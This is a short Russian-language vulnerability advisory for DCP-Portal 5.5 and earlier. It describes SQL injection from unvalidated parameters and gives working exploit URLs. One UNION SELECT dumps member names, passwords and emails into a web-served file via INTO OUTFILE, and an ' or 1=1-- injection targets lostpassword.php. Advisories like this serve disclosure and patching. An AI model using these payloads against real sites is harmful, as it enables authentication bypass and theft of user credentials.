Программа: DCP-Portal 5.5 и более ранние версии
Уязвимость обнаружена в DCP-Portal 5.x. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.
DCP-Portal не проверяет данные, представленные пользователем, перед передачей их к динамическому SQL запросу в различных параметрах и сценариях. В результате удаленный пользователь может манипулировать SQL запросом, чтобы обойти идентификацию, манипулировать данными и извлекать произвольные данные.
Пример/Эксплоит:
http://localhost/dcp/advertiser.php? adv_logged=1&username=1&password=qwe'
or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe'
or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile
'/var/www/html/dcpad.txt
http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'